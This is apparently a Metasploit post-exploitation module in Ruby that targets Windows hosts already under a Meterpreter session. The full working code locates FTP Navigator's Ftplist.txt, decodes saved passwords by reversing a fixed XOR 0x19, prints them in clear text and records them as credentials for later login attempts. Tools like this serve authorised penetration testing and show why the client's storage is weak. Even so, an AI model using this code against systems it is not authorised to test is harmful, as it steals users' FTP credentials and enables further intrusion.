rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/post/windows/gather/credentials/ftpnavigator.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
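# Post module that recovers saved FTP logins from the FTP Navigator client on
# a Windows Meterpreter session and records them in the framework database.
#
# The client keeps its site list in Ftplist.txt under its install directory.
# A saved password there is only XORed byte-by-byte with the fixed value 0x19
# (see #decode_pass). That is reversible obfuscation, not encryption, so any
# account able to read the file can recover every saved password. When this
# module returns results, the remediation is to stop saving passwords in the
# client and to rotate the credentials that were stored.
class MetasploitModule < Msf::Post
  include Msf::Post::Windows::Registry
  include Msf::Auxiliary::Report

  # Registers the module metadata with the framework.
  #
  # @param info [Hash] metadata supplied by the framework, merged via update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Windows Gather FTP Navigator Saved Password Extraction',
        'Description' => %q{
          This module extracts saved passwords from the FTP Navigator FTP client.
          It will decode the saved passwords and store them in the database.
        },
        'License' => MSF_LICENSE,
        'Author' => ['theLightCosine'],
        'Platform' => [ 'win' ],
        'SessionTypes' => [ 'meterpreter' ],
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'SideEffects' => [],
          'Reliability' => []
        },
        'Compat' => {
          'Meterpreter' => {
            # core_channel_close is listed because #run now closes the remote
            # file handle once the list has been read.
            'Commands' => %w[
              core_channel_close
              core_channel_eof
              core_channel_open
              core_channel_read
              core_channel_write
            ]
          }
        }
      )
    )
  end

  # Locates Ftplist.txt, parses every non-anonymous entry that carries a saved
  # password, prints it and stores it as a credential plus an untried login.
  #
  # Decoded passwords are written to the console in clear text, so console
  # logs and spool files from a run hold live credentials.
  #
  # @return [void]
  def run
    key = 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\FTP Navigator_is1\\'
    val_name = 'InstallLocation'
    # Fall back to the default install path when the uninstall key is missing.
    installdir = registry_getvaldata(key, val_name) || 'c:\\FTP Navigator\\'

    path = "#{installdir}Ftplist.txt"

    begin
      ftplist = client.fs.file.new(path, 'r')
    rescue Rex::Post::Meterpreter::RequestError => e
      print_error("Unable to open Ftplist.txt: #{e}")
      print_error('FTP Navigator May not Be Installed')
      return
    end

    # Release the remote file channel as soon as the content is in memory, so
    # the handle is not left open on the target for the rest of the session.
    begin
      contents = ftplist.read
    ensure
      ftplist.close
    end

    # NOTE(review): splitting on "\n" alone leaves a trailing "\r" on each line
    # if the file uses CRLF line endings. Confirm against a real Ftplist.txt
    # before changing the separator.
    contents.split("\n").each do |line|
      next if line.include? 'Anonymous=1'
      next unless line.include? ';Password='

      dpass = ''
      username = ''
      server = ''
      port = ''

      line.split(';').each do |field|
        # "SavePassword" also contains "Password", so it is skipped before
        # the substring checks below.
        next if field.include? 'SavePassword'

        if field.include? 'Password='
          dpass = decode_pass(split_values(field))
        elsif field.include? 'User='
          username = split_values(field)
        elsif field.include? 'Server='
          server = split_values(field)
        elsif field.include? 'Port='
          port = split_values(field)
        end
      end

      print_good("Host: #{server} Port: #{port} User: #{username} Pass: #{dpass}")
      report_ftp_credential(server, port, username, dpass)
    end
  end

  # Stores one recovered login as a credential core and an untried FTP login.
  #
  # @param server [String] host name or address taken from the Server= field
  # @param port [String] port taken from the Port= field
  # @param username [String] value of the User= field
  # @param password [String] decoded password
  # @return [void]
  def report_ftp_credential(server, port, username, password)
    # NOTE(review): Rex::Socket.getaddress presumably raises when the saved
    # host name does not resolve, which would abort the remaining entries.
    # Confirm whether a per-entry rescue is wanted.
    service_data = {
      address: Rex::Socket.getaddress(server),
      port: port,
      protocol: 'tcp',
      service_name: 'ftp',
      workspace_id: myworkspace_id
    }

    credential_data = {
      origin_type: :session,
      session_id: session_db_id,
      post_reference_name: refname,
      username: username,
      private_data: password,
      private_type: :password
    }

    credential_core = create_credential(credential_data.merge(service_data))

    login_data = {
      core: credential_core,
      access_level: 'User',
      status: Metasploit::Model::Login::Status::UNTRIED
    }

    create_credential_login(login_data.merge(service_data))
  end

  # Returns the value part of a "Name=value" field.
  #
  # @param field [String] one ';'-separated field of an Ftplist.txt line
  # @return [String, nil] text after the first '=', or nil when there is no '='
  def split_values(field)
    # Limit of 2 keeps any further '=' characters inside the value.
    field.split('=', 2)[1]
  end

  # Reverses FTP Navigator's password obfuscation by XORing each byte with 0x19.
  #
  # @param encoded [String] stored password value
  # @return [String] decoded password
  def decode_pass(encoded)
    # String#<< with an Integer appends that codepoint to the string.
    encoded.each_byte.with_object(+'') do |byte, decoded|
      decoded << (byte ^ 0x19)
    end
  end
end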